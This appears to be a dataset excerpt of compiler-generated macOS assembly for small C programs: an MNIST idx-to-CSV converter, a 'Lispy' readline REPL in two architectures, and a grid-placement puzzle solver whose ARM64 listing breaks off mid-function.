callq _fprintf
jmp LBB1_27
LBB1_6:
leaq -808(%rbp), %rdi
movq -848(%rbp), %rcx
movl $1, %esi
movl $8, %edx
callq _fread
cmpq $8, %rax
je LBB1_8
## %bb.7:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.13(%rip), %rsi
movb $0, %al
callq _fprintf
jmp LBB1_27
LBB1_8:
leaq -800(%rbp), %rdi
callq _ReadBigEndianInt32
cmpl $2051, %eax ## imm = 0x803
je LBB1_10
## %bb.9:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.14(%rip), %rsi
movb $0, %al
callq _fprintf
jmp LBB1_27
LBB1_10:
leaq -808(%rbp), %rdi
callq _ReadBigEndianInt32
cmpl $2049, %eax ## imm = 0x801
je LBB1_12
## %bb.11:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.15(%rip), %rsi
movb $0, %al
callq _fprintf
jmp LBB1_27
LBB1_12:
leaq -800(%rbp), %rdi
addq $4, %rdi
callq _ReadBigEndianInt32
movl %eax, -860(%rbp)
movl -860(%rbp), %eax
movl %eax, -872(%rbp) ## 4-byte Spill
leaq -808(%rbp), %rdi
addq $4, %rdi
callq _ReadBigEndianInt32
movl %eax, %ecx
movl -872(%rbp), %eax ## 4-byte Reload
cmpl %ecx, %eax
je LBB1_14
## %bb.13:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.16(%rip), %rsi
movb $0, %al
callq _fprintf
jmp LBB1_27
LBB1_14:
movl -860(%rbp), %esi
leaq L_.str.17(%rip), %rdi
movb $0, %al
callq _printf
leaq -800(%rbp), %rdi
addq $8, %rdi
callq _ReadBigEndianInt32
leaq -800(%rbp), %rdi
addq $12, %rdi
callq _ReadBigEndianInt32
movl $0, -864(%rbp)
LBB1_15: ## =>This Loop Header: Depth=1
## Child Loop BB1_21 Depth 2
movl -860(%rbp), %eax
movl %eax, %ecx
addl $-1, %ecx
movl %ecx, -860(%rbp)
cmpl $0, %eax
je LBB1_26
## %bb.16: ## in Loop: Header=BB1_15 Depth=1
leaq -800(%rbp), %rdi
movq -840(%rbp), %rcx
movl $1, %esi
movl $784, %edx ## imm = 0x310
callq _fread
cmpq $784, %rax ## imm = 0x310
je LBB1_18
## %bb.17:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.18(%rip), %rsi
movb $0, %al
callq _fprintf
jmp LBB1_27
LBB1_18: ## in Loop: Header=BB1_15 Depth=1
leaq -808(%rbp), %rdi
movq -848(%rbp), %rcx
movl $1, %edx
movq %rdx, %rsi
callq _fread
cmpq $1, %rax
je LBB1_20
## %bb.19:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
leaq L_.str.19(%rip), %rsi
movb $0, %al
callq _fprintf
jmp LBB1_27
LBB1_20: ## in Loop: Header=BB1_15 Depth=1
movq -856(%rbp), %rdi
movl -864(%rbp), %edx
leaq L_.str.20(%rip), %rsi
movb $0, %al
callq _fprintf
movl $0, -868(%rbp)
LBB1_21: ## Parent Loop BB1_15 Depth=1
## => This Inner Loop Header: Depth=2
cmpl $784, -868(%rbp) ## imm = 0x310
je LBB1_24
## %bb.22: ## in Loop: Header=BB1_21 Depth=2
movq -856(%rbp), %rdi
movslq -868(%rbp), %rax
movzbl -800(%rbp,%rax), %edx
leaq L_.str.21(%rip), %rsi
movb $0, %al
callq _fprintf
## %bb.23: ## in Loop: Header=BB1_21 Depth=2
movl -868(%rbp), %eax
addl $1, %eax
movl %eax, -868(%rbp)
jmp LBB1_21
LBB1_24: ## in Loop: Header=BB1_15 Depth=1
movq -856(%rbp), %rdi
movzbl -808(%rbp), %edx
leaq L_.str.22(%rip), %rsi
movb $0, %al
callq _fprintf
## %bb.25: ## in Loop: Header=BB1_15 Depth=1
movl -864(%rbp), %eax
addl $1, %eax
movl %eax, -864(%rbp)
jmp LBB1_15
LBB1_26:
jmp LBB1_27
LBB1_27:
movq -840(%rbp), %rdi
callq _fclose
movq -848(%rbp), %rdi
callq _fclose
movq -856(%rbp), %rdi
callq _fclose
movq -816(%rbp), %rsi
movq -824(%rbp), %rdx
movq -832(%rbp), %rcx
leaq L_.str.23(%rip), %rdi
movb $0, %al
callq _printf
movq ___stack_chk_guard@GOTPCREL(%rip), %rax
movq (%rax), %rax
movq -8(%rbp), %rcx
cmpq %rcx, %rax
jne LBB1_29
## %bb.28:
addq $880, %rsp ## imm = 0x370
popq %rbp
retq
LBB1_29:
callq ___stack_chk_fail
ud2
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function ReadBigEndianInt32
_ReadBigEndianInt32: ## @ReadBigEndianInt32
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
movq -8(%rbp), %rax
movzbl (%rax), %eax
shll $24, %eax
movq -8(%rbp), %rcx
movzbl 1(%rcx), %ecx
shll $16, %ecx
orl %ecx, %eax
movq -8(%rbp), %rcx
movzbl 2(%rcx), %ecx
shll $8, %ecx
orl %ecx, %eax
movq -8(%rbp), %rcx
movzbl 3(%rcx), %ecx
orl %ecx, %eax
popq %rbp
retq
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "train-images.idx3-ubyte"
L_.str.1: ## @.str.1
.asciz "train-labels.idx1-ubyte"
L_.str.2: ## @.str.2
.asciz "train.csv"
L_.str.3: ## @.str.3
.asciz "t10k-images.idx3-ubyte"
L_.str.4: ## @.str.4
.asciz "t10k-labels.idx1-ubyte"
L_.str.5: ## @.str.5
.asciz "test.csv"
L_.str.6: ## @.str.6
.asciz "r"
L_.str.7: ## @.str.7
.asciz "w"
L_.str.8: ## @.str.8
.asciz "Opened %s and %s for reading and %s for writing.\n"
L_.str.9: ## @.str.9
.asciz "id"
L_.str.10: ## @.str.10
.asciz ",X%d"
L_.str.11: ## @.str.11
.asciz ",Y\n"
L_.str.12: ## @.str.12
.asciz "Could not read image file header.\n"
L_.str.13: ## @.str.13
.asciz "Could not read label file header.\n"
L_.str.14: ## @.str.14
.asciz "Unexpected magic number of image file.\n"
L_.str.15: ## @.str.15
.asciz "Unexpected magic number of label file.\n"
L_.str.16: ## @.str.16
.asciz "Numbers of images and labels don't match.\n"
L_.str.17: ## @.str.17
.asciz "Processing %d items...\n"
L_.str.18: ## @.str.18
.asciz "Could not read image."
L_.str.19: ## @.str.19
.asciz "Could not read label."
L_.str.20: ## @.str.20
.asciz "%d"
L_.str.21: ## @.str.21
.asciz ",%d"
L_.str.22: ## @.str.22
.asciz ",%d\n"
L_.str.23: ## @.str.23
.asciz "Closed %s, %s and %s.\n"
.subsections_via_symbols
| the_stack_data/206392337.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
sub sp, sp, #48
.cfi_def_cfa_offset 48
stp x29, x30, [sp, #32] ; 16-byte Folded Spill
add x29, sp, #32
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
stur wzr, [x29, #-4]
stur w0, [x29, #-8]
str x1, [sp, #16]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _puts
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _puts
b LBB0_1
LBB0_1: ; =>This Inner Loop Header: Depth=1
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _readline
str x0, [sp, #8]
ldr x0, [sp, #8]
bl _add_history
ldr x8, [sp, #8]
mov x9, sp
str x8, [x9]
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _printf
ldr x0, [sp, #8]
bl _free
b LBB0_1
.cfi_endproc
; -- End function
.section __TEXT,__cstring,cstring_literals
l_.str: ; @.str
.asciz "Lispy Version 0.0.1"
l_.str.1: ; @.str.1
.asciz "Press Ctrl+c to Exit\n"
l_.str.2: ; @.str.2
.asciz "lispy> "
l_.str.3: ; @.str.3
.asciz "No, you're a %s\n"
.subsections_via_symbols
| .section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ## -- Begin function main
.p2align 4, 0x90
_main: ## @main
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movl $0, -4(%rbp)
movl %edi, -8(%rbp)
movq %rsi, -16(%rbp)
leaq L_.str(%rip), %rdi
callq _puts
leaq L_.str.1(%rip), %rdi
callq _puts
LBB0_1: ## =>This Inner Loop Header: Depth=1
leaq L_.str.2(%rip), %rdi
callq _readline
movq %rax, -24(%rbp)
movq -24(%rbp), %rdi
callq _add_history
movq -24(%rbp), %rsi
leaq L_.str.3(%rip), %rdi
movb $0, %al
callq _printf
movq -24(%rbp), %rdi
callq _free
jmp LBB0_1
.cfi_endproc
## -- End function
.section __TEXT,__cstring,cstring_literals
L_.str: ## @.str
.asciz "Lispy Version 0.0.1"
L_.str.1: ## @.str.1
.asciz "Press Ctrl+c to Exit\n"
L_.str.2: ## @.str.2
.asciz "lispy> "
L_.str.3: ## @.str.3
.asciz "No, you're a %s\n"
.subsections_via_symbols
| the_stack_data/495276.c |
.section __TEXT,__text,regular,pure_instructions
.build_version macos, 13, 0 sdk_version 13, 3
.globl _main ; -- Begin function main
.p2align 2
_main: ; @main
.cfi_startproc
; %bb.0:
stp x28, x27, [sp, #-32]! ; 16-byte Folded Spill
.cfi_def_cfa_offset 32
stp x29, x30, [sp, #16] ; 16-byte Folded Spill
add x29, sp, #16
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
mov w9, #25600
adrp x16, ___chkstk_darwin@GOTPAGE
ldr x16, [x16, ___chkstk_darwin@GOTPAGEOFF]
blr x16
sub sp, sp, #6, lsl #12 ; =24576
sub sp, sp, #1024
sub x8, x29, #32
str x8, [sp, #40] ; 8-byte Folded Spill
adrp x8, ___stack_chk_guard@GOTPAGE
ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF]
ldr x8, [x8]
stur x8, [x29, #-24]
str wzr, [sp, #132]
mov x9, sp
add x8, sp, #128
str x8, [x9]
adrp x0, l_.str@PAGE
add x0, x0, l_.str@PAGEOFF
bl _scanf
mov w8, #1
str w8, [sp, #96]
b LBB0_1
LBB0_1: ; =>This Loop Header: Depth=1
; Child Loop BB0_3 Depth 2
; Child Loop BB0_13 Depth 2
; Child Loop BB0_15 Depth 3
; Child Loop BB0_29 Depth 2
; Child Loop BB0_31 Depth 3
; Child Loop BB0_40 Depth 2
; Child Loop BB0_42 Depth 3
; Child Loop BB0_69 Depth 2
; Child Loop BB0_73 Depth 2
; Child Loop BB0_77 Depth 2
ldr w8, [sp, #96]
ldr w9, [sp, #128]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB0_82
b LBB0_2
LBB0_2: ; in Loop: Header=BB0_1 Depth=1
str wzr, [sp, #112]
str wzr, [sp, #108]
str wzr, [sp, #104]
str wzr, [sp, #100]
mov x9, sp
add x8, sp, #124
str x8, [x9]
add x8, sp, #120
str x8, [x9, #8]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _scanf
add x0, sp, #6, lsl #12 ; =24576
add x0, x0, #600
mov w1, #48
str w1, [sp, #28] ; 4-byte Folded Spill
mov x2, #408
bl _memset
ldr w1, [sp, #28] ; 4-byte Folded Reload
add x0, sp, #6, lsl #12 ; =24576
add x0, x0, #392
mov x2, #208
bl _memset
ldr w1, [sp, #28] ; 4-byte Folded Reload
add x0, sp, #3, lsl #12 ; =12288
add x0, x0, #1864
mov x2, #10816
str x2, [sp, #32] ; 8-byte Folded Spill
bl _memset
ldr w1, [sp, #28] ; 4-byte Folded Reload
ldr x2, [sp, #32] ; 8-byte Folded Reload
add x0, sp, #3336
bl _memset
str wzr, [sp, #92]
b LBB0_3
LBB0_3: ; Parent Loop BB0_1 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #92]
ldr w9, [sp, #120]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_12
b LBB0_4
LBB0_4: ; in Loop: Header=BB0_3 Depth=2
mov x9, sp
add x8, sp, #116
str x8, [x9]
adrp x0, l_.str.2@PAGE
add x0, x0, l_.str.2@PAGEOFF
bl _scanf
sub x10, x29, #32
add x8, x10, #4
mov x9, sp
str x10, [x9]
str x8, [x9, #8]
adrp x0, l_.str.1@PAGE
add x0, x0, l_.str.1@PAGEOFF
bl _scanf
ldrsb w8, [sp, #116]
subs w8, w8, #43
cset w8, eq
tbnz w8, #0, LBB0_6
b LBB0_5
LBB0_5: ; in Loop: Header=BB0_3 Depth=2
ldrsb w8, [sp, #116]
subs w8, w8, #111
cset w8, ne
tbnz w8, #0, LBB0_7
b LBB0_6
LBB0_6: ; in Loop: Header=BB0_3 Depth=2
ldr x9, [sp, #40] ; 8-byte Folded Reload
ldr w8, [x9]
ldr w10, [x9, #4]
add w8, w8, w10
add x10, sp, #6, lsl #12 ; =24576
add x10, x10, #600
add x11, x10, w8, sxtw #1
mov w8, #49
strb w8, [x11]
ldr w11, [x9]
ldr w12, [x9, #4]
subs w11, w11, w12
ldr w12, [sp, #124]
add w11, w11, w12
add x10, x10, w11, sxtw #1
strb w8, [x10, #1]
ldrsw x8, [x9]
mov x10, #104
mul x10, x8, x10
add x8, sp, #3, lsl #12 ; =12288
add x8, x8, #1864
add x8, x8, x10
ldrsw x9, [x9, #4]
add x9, x8, x9
mov w8, #51
strb w8, [x9]
b LBB0_7
LBB0_7: ; in Loop: Header=BB0_3 Depth=2
ldrsb w8, [sp, #116]
subs w8, w8, #120
cset w8, eq
tbnz w8, #0, LBB0_9
b LBB0_8
LBB0_8: ; in Loop: Header=BB0_3 Depth=2
ldrsb w8, [sp, #116]
subs w8, w8, #111
cset w8, ne
tbnz w8, #0, LBB0_10
b LBB0_9
LBB0_9: ; in Loop: Header=BB0_3 Depth=2
ldr x9, [sp, #40] ; 8-byte Folded Reload
ldrsw x11, [x9]
add x10, sp, #6, lsl #12 ; =24576
add x10, x10, #392
mov x8, x10
add x11, x8, x11, lsl #1
mov w8, #49
strb w8, [x11]
ldrsw x11, [x9, #4]
add x10, x10, x11, lsl #1
strb w8, [x10, #1]
ldrsw x8, [x9]
mov x10, #104
mul x10, x8, x10
add x8, sp, #3336
add x8, x8, x10
ldrsw x9, [x9, #4]
add x9, x8, x9
mov w8, #51
strb w8, [x9]
b LBB0_10
LBB0_10: ; in Loop: Header=BB0_3 Depth=2
b LBB0_11
LBB0_11: ; in Loop: Header=BB0_3 Depth=2
ldr w8, [sp, #92]
add w8, w8, #1
str w8, [sp, #92]
b LBB0_3
LBB0_12: ; in Loop: Header=BB0_1 Depth=1
ldr w8, [sp, #124]
str w8, [sp, #88]
mov w8, #1
str w8, [sp, #84]
b LBB0_13
LBB0_13: ; Parent Loop BB0_1 Depth=1
; => This Loop Header: Depth=2
; Child Loop BB0_15 Depth 3
ldr w8, [sp, #88]
ldr w9, [sp, #84]
subs w8, w8, w9
cset w8, lt
tbnz w8, #0, LBB0_28
b LBB0_14
LBB0_14: ; in Loop: Header=BB0_13 Depth=2
ldr w8, [sp, #84]
str w8, [sp, #80]
b LBB0_15
LBB0_15: ; Parent Loop BB0_1 Depth=1
; Parent Loop BB0_13 Depth=2
; => This Inner Loop Header: Depth=3
ldr w8, [sp, #80]
ldr w9, [sp, #88]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB0_26
b LBB0_16
LBB0_16: ; in Loop: Header=BB0_15 Depth=3
ldr w8, [sp, #84]
ldr w9, [sp, #80]
add w9, w8, w9
; implicit-def: $x8
mov x8, x9
sxtw x8, w8
lsl x9, x8, #1
add x8, sp, #6, lsl #12 ; =24576
add x8, x8, #600
ldrsb w8, [x8, x9]
subs w8, w8, #48
cset w8, ne
tbnz w8, #0, LBB0_20
b LBB0_17
LBB0_17: ; in Loop: Header=BB0_15 Depth=3
ldr w8, [sp, #84]
ldr w9, [sp, #80]
subs w8, w8, w9
ldr w9, [sp, #124]
add w9, w8, w9
add x8, sp, #6, lsl #12 ; =24576
add x8, x8, #600
add x8, x8, w9, sxtw #1
ldrsb w8, [x8, #1]
subs w8, w8, #48
cset w8, ne
tbnz w8, #0, LBB0_19
b LBB0_18
LBB0_18: ; in Loop: Header=BB0_15 Depth=3
ldrsw x8, [sp, #84]
mov x9, #104
mul x9, x8, x9
add x8, sp, #3, lsl #12 ; =12288
add x8, x8, #1864
add x8, x8, x9
ldrsw x9, [sp, #80]
add x9, x8, x9
mov w8, #50
strb w8, [x9]
ldr w8, [sp, #80]
ldr w9, [sp, #84]
add w8, w8, w9
add x9, sp, #6, lsl #12 ; =24576
add x9, x9, #600
add x10, x9, w8, sxtw #1
mov w8, #49
strb w8, [x10]
ldr w10, [sp, #84]
ldr w11, [sp, #80]
subs w10, w10, w11
ldr w11, [sp, #124]
add w10, w10, w11
add x9, x9, w10, sxtw #1
strb w8, [x9, #1]
b LBB0_19
LBB0_19: ; in Loop: Header=BB0_15 Depth=3
b LBB0_20
LBB0_20: ; in Loop: Header=BB0_15 Depth=3
ldr w8, [sp, #88]
ldr w9, [sp, #80]
add w9, w8, w9
; implicit-def: $x8
mov x8, x9
sxtw x8, w8
lsl x9, x8, #1
add x8, sp, #6, lsl #12 ; =24576
add x8, x8, #600
ldrsb w8, [x8, x9]
subs w8, w8, #48
cset w8, ne
tbnz w8, #0, LBB0_24
b LBB0_21
LBB0_21: ; in Loop: Header=BB0_15 Depth=3
ldr w8, [sp, #88]
ldr w9, [sp, #80]
subs w8, w8, w9
ldr w9, [sp, #124]
add w9, w8, w9
add x8, sp, #6, lsl #12 ; =24576
add x8, x8, #600
add x8, x8, w9, sxtw #1
ldrsb w8, [x8, #1]
subs w8, w8, #48
cset w8, ne
tbnz w8, #0, LBB0_23
b LBB0_22
LBB0_22: ; in Loop: Header=BB0_15 Depth=3
ldrsw x8, [sp, #88]
mov x9, #104
mul x9, x8, x9
add x8, sp, #3, lsl #12 ; =12288
add x8, x8, #1864
add x8, x8, x9
ldrsw x9, [sp, #80]
add x9, x8, x9
mov w8, #50
strb w8, [x9]
ldr w8, [sp, #88]
ldr w9, [sp, #80]
add w8, w8, w9
add x9, sp, #6, lsl #12 ; =24576
add x9, x9, #600
add x10, x9, w8, sxtw #1
mov w8, #49
strb w8, [x10]
ldr w10, [sp, #88]
ldr w11, [sp, #80]
subs w10, w10, w11
ldr w11, [sp, #124]
add w10, w10, w11
add x9, x9, w10, sxtw #1
strb w8, [x9, #1]
b LBB0_23
LBB0_23: ; in Loop: Header=BB0_15 Depth=3
b LBB0_24
LBB0_24: ; in Loop: Header=BB0_15 Depth=3
b LBB0_25
LBB0_25: ; in Loop: Header=BB0_15 Depth=3
ldr w8, [sp, #80]
add w8, w8, #1
str w8, [sp, #80]
b LBB0_15
LBB0_26: ; in Loop: Header=BB0_13 Depth=2
b LBB0_27
LBB0_27: ; in Loop: Header=BB0_13 Depth=2
ldr w8, [sp, #88]
subs w8, w8, #1
str w8, [sp, #88]
ldr w8, [sp, #84]
add w8, w8, #1
str w8, [sp, #84]
b LBB0_13
LBB0_28: ; in Loop: Header=BB0_1 Depth=1
mov w8, #1
str w8, [sp, #76]
b LBB0_29
LBB0_29: ; Parent Loop BB0_1 Depth=1
; => This Loop Header: Depth=2
; Child Loop BB0_31 Depth 3
ldr w8, [sp, #76]
ldr w9, [sp, #124]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB0_39
b LBB0_30
LBB0_30: ; in Loop: Header=BB0_29 Depth=2
mov w8, #1
str w8, [sp, #72]
b LBB0_31
LBB0_31: ; Parent Loop BB0_1 Depth=1
; Parent Loop BB0_29 Depth=2
; => This Inner Loop Header: Depth=3
ldr w8, [sp, #72]
ldr w9, [sp, #124]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB0_37
b LBB0_32
LBB0_32: ; in Loop: Header=BB0_31 Depth=3
ldrsw x8, [sp, #76]
lsl x9, x8, #1
add x8, sp, #6, lsl #12 ; =24576
add x8, x8, #392
ldrsb w8, [x8, x9]
subs w8, w8, #48
cset w8, ne
tbnz w8, #0, LBB0_35
b LBB0_33
LBB0_33: ; in Loop: Header=BB0_31 Depth=3
ldrsw x9, [sp, #72]
add x8, sp, #6, lsl #12 ; =24576
add x8, x8, #392
add x8, x8, x9, lsl #1
ldrsb w8, [x8, #1]
subs w8, w8, #48
cset w8, ne
tbnz w8, #0, LBB0_35
b LBB0_34
LBB0_34: ; in Loop: Header=BB0_31 Depth=3
ldrsw x8, [sp, #76]
mov x9, #104
mul x9, x8, x9
add x8, sp, #3336
add x8, x8, x9
ldrsw x9, [sp, #72]
add x9, x8, x9
mov w8, #50
strb w8, [x9]
ldrsw x10, [sp, #76]
add x9, sp, #6, lsl #12 ; =24576
add x9, x9, #392
mov x8, x9
add x10, x8, x10, lsl #1
mov w8, #49
strb w8, [x10]
ldrsw x10, [sp, #72]
add x9, x9, x10, lsl #1
strb w8, [x9, #1]
b LBB0_35
LBB0_35: ; in Loop: Header=BB0_31 Depth=3
b LBB0_36
LBB0_36: ; in Loop: Header=BB0_31 Depth=3
ldr w8, [sp, #72]
add w8, w8, #1
str w8, [sp, #72]
b LBB0_31
LBB0_37: ; in Loop: Header=BB0_29 Depth=2
b LBB0_38
LBB0_38: ; in Loop: Header=BB0_29 Depth=2
ldr w8, [sp, #76]
add w8, w8, #1
str w8, [sp, #76]
b LBB0_29
LBB0_39: ; in Loop: Header=BB0_1 Depth=1
mov w8, #1
str w8, [sp, #68]
b LBB0_40
LBB0_40: ; Parent Loop BB0_1 Depth=1
; => This Loop Header: Depth=2
; Child Loop BB0_42 Depth 3
ldr w8, [sp, #68]
ldr w9, [sp, #124]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB0_68
b LBB0_41
LBB0_41: ; in Loop: Header=BB0_40 Depth=2
mov w8, #1
str w8, [sp, #64]
b LBB0_42
LBB0_42: ; Parent Loop BB0_1 Depth=1
; Parent Loop BB0_40 Depth=2
; => This Inner Loop Header: Depth=3
ldr w8, [sp, #64]
ldr w9, [sp, #124]
subs w8, w8, w9
cset w8, gt
tbnz w8, #0, LBB0_66
b LBB0_43
LBB0_43: ; in Loop: Header=BB0_42 Depth=3
ldrsw x8, [sp, #68]
mov x9, #104
mul x9, x8, x9
add x8, sp, #3336
add x8, x8, x9
ldrsw x9, [sp, #64]
ldrsb w8, [x8, x9]
subs w8, w8, #50
cset w8, ne
tbnz w8, #0, LBB0_46
b LBB0_44
LBB0_44: ; in Loop: Header=BB0_42 Depth=3
ldrsw x8, [sp, #68]
mov x9, #104
mul x9, x8, x9
add x8, sp, #3, lsl #12 ; =12288
add x8, x8, #1864
add x8, x8, x9
ldrsw x9, [sp, #64]
ldrsb w8, [x8, x9]
subs w8, w8, #50
cset w8, lt
tbnz w8, #0, LBB0_46
b LBB0_45
LBB0_45: ; in Loop: Header=BB0_42 Depth=3
ldr w8, [sp, #68]
ldrsw x9, [sp, #104]
lsl x10, x9, #3
add x9, sp, #136
str w8, [x9, x10]
ldr w8, [sp, #64]
ldrsw x10, [sp, #104]
add x9, x9, x10, lsl #3
str w8, [x9, #4]
ldr w8, [sp, #104]
add w8, w8, #1
str w8, [sp, #104]
b LBB0_64
LBB0_46: ; in Loop: Header=BB0_42 Depth=3
ldrsw x8, [sp, #68]
mov x9, #104
mul x9, x8, x9
add x8, sp, #3336
add x8, x8, x9
ldrsw x9, [sp, #64]
ldrsb w8, [x8, x9]
subs w8, w8, #51
cset w8, ne
tbnz w8, #0, LBB0_49
b LBB0_47
LBB0_47: ; in Loop: Header=BB0_42 Depth=3
ldrsw x8, [sp, #68]
mov x9, #104
mul x9, x8, x9
add x8, sp, #3, lsl #12 ; =12288
add x8, x8, #1864
add x8, x8, x9
ldrsw x9, [sp, #64]
ldrsb w8, [x8, x9]
subs w8, w8, #51
cset w8, ne
tbnz w8, #0, LBB0_49
b LBB0_48
LBB0_48: ; in Loop: Header=BB0_42 Depth=3
ldr w8, [sp, #100]
add w8, w8, #2
str w8, [sp, #100]
b LBB0_63
LBB0_49: ; in Loop: Header=BB0_42 Depth=3
ldrsw x8, [sp, #68]
mov x9, #104
mul x9, x8, x9
add x8, sp, #3336
add x8, x8, x9
ldrsw x9, [sp, #64]
ldrsb w8, [x8, x9]
subs w8, w8, #51
cset w8, ne
tbnz w8, #0, LBB0_52
b LBB0_50
LBB0_50: ; in Loop: Header=BB0_42 Depth=3
ldrsw x8, [sp, #68]
mov x9, #104
mul x9, x8, x9
add x8, sp, #3, lsl #12 ; =12288
add x8, x8, #1864
add x8, x8, x9
ldrsw x9, [sp, #64]
ldrsb w8, [x8, x9]
subs w8, w8, #50
cset w8, ne
tbnz w8, #0, LBB0_52
b LBB0_51
LBB0_51: ; in Loop: Header=BB0_42 Depth=3
ldr w8, [sp, #68]
ldrsw x9, [sp, #104]
lsl x10, x9, #3
add x9, sp, #136
str w8, [x9, x10]
ldr w8, [sp, #64]
ldrsw x10, [sp, #104]
add x9, x9, x10, lsl #3
str w8, [x9, #4]
ldr w8, [sp, #104]
add w8, w8, #1
str w8, [sp, #104]
b LBB0_62
LBB0_52: ; in Loop: Header=BB0_42 Depth=3
ldrsw x8, [sp, #68]
mov x9, #104
mul x9, x8, x9
add x8, sp, #3336
add x8, x8, x9
ldrsw x9, [sp, #64]
ldrsb w8, [x8, x9]
subs w8, w8, #50
cset w8, ne
tbnz w8, #0, LBB0_54
b LBB0_53
LBB0_53: ; in Loop: Header=BB0_42 Depth=3
ldr w8, [sp, #68]
ldrsw x9, [sp, #108]
lsl x10, x9, #3
add x9, sp, #936
str w8, [x9, x10]
ldr w8, [sp, #64]
ldrsw x10, [sp, #108]
add x9, x9, x10, lsl #3
str w8, [x9, #4]
ldr w8, [sp, #108]
add w8, w8, #1
str w8, [sp, #108]
b LBB0_61
LBB0_54: ; in Loop: Header=BB0_42 Depth=3
ldrsw x8, [sp, #68]
mov x9, #104
mul x9, x8, x9
add x8, sp, #3, lsl #12 ; =12288
add x8, x8, #1864
add x8, x8, x9
ldrsw x9, [sp, #64]
ldrsb w8, [x8, x9]
subs w8, w8, #50
cset w8, ne
tbnz w8, #0, LBB0_56
b LBB0_55
LBB0_55: ; in Loop: Header=BB0_42 Depth=3
ldr w8, [sp, #68]
ldrsw x9, [sp, #112]
lsl x10, x9, #3
add x9, sp, #1736
str w8, [x9, x10]
ldr w8, [sp, #64]
ldrsw x10, [sp, #112]
add x9, x9, x10, lsl #3
str w8, [x9, #4]
ldr w8, [sp, #112]
add w8, w8, #1
str w8, [sp, #112]
b LBB0_60
LBB0_56: ; in Loop: Header=BB0_42 Depth=3
ldrsw x8, [sp, #68]
mov x9, #104
mul x9, x8, x9
add x8, sp, #3336
add x8, x8, x9
ldrsw x9, [sp, #64]
ldrsb w8, [x8, x9]
subs w8, w8, #51
cset w8, eq
tbnz w8, #0, LBB0_58
b LBB0_57
LBB0_57: ; in Loop: Header=BB0_42 Depth=3
ldrsw x8, [sp, #68]
mov x9, #104
mul x9, x8, x9
add x8, sp, #3, lsl #12 ; =12288
add x8, x8, #1864
add x8, x8, x9
ldrsw x9, [sp, #64]
ldrsb w8, [x8, x9]
subs w8, w8, #51
cset w8, ne
tbnz w8, #0, LBB0_59
b LBB0_58
LBB0_58: ; in Loop: Header=BB0_42 Depth=3
ldr w8, [sp, #100]
add w8, w8, #1
str w8, [sp, #100]
b LBB0_59
LBB0_59: ; in Loop: Header=BB0_42 Depth=3
b LBB0_60
LBB0_60: ; in Loop: Header=BB0_42 Depth=3
b LBB0_61
LBB0_61: ; in Loop: Header=BB0_42 Depth=3
b LBB0_62
LBB0_62: ; in Loop: Header=BB0_42 Depth=3
b LBB0_63
LBB0_63: ; in Loop: Header=BB0_42 Depth=3
b LBB0_64
LBB0_64: ; in Loop: Header=BB0_42 Depth=3
b LBB0_65
LBB0_65: ; in Loop: Header=BB0_42 Depth=3
ldr w8, [sp, #64]
add w8, w8, #1
str w8, [sp, #64]
b LBB0_42
LBB0_66: ; in Loop: Header=BB0_40 Depth=2
b LBB0_67
LBB0_67: ; in Loop: Header=BB0_40 Depth=2
ldr w8, [sp, #68]
add w8, w8, #1
str w8, [sp, #68]
b LBB0_40
LBB0_68: ; in Loop: Header=BB0_1 Depth=1
ldr w9, [sp, #96]
; implicit-def: $x8
mov x8, x9
ldr w9, [sp, #100]
ldr w10, [sp, #108]
add w9, w9, w10
ldr w10, [sp, #112]
add w9, w9, w10
ldr w11, [sp, #104]
mov w10, #2
mul w10, w10, w11
add w11, w9, w10
ldr w9, [sp, #108]
ldr w10, [sp, #112]
add w9, w9, w10
ldr w10, [sp, #104]
add w10, w9, w10
mov x9, sp
str x8, [x9]
; implicit-def: $x8
mov x8, x11
str x8, [x9, #8]
; implicit-def: $x8
mov x8, x10
str x8, [x9, #16]
adrp x0, l_.str.3@PAGE
add x0, x0, l_.str.3@PAGEOFF
bl _printf
str wzr, [sp, #60]
b LBB0_69
LBB0_69: ; Parent Loop BB0_1 Depth=1
; => This Inner Loop Header: Depth=2
ldr w8, [sp, #60]
ldr w9, [sp, #104]
subs w8, w8, w9
cset w8, ge
tbnz w8, #0, LBB0_72
b LBB0_70
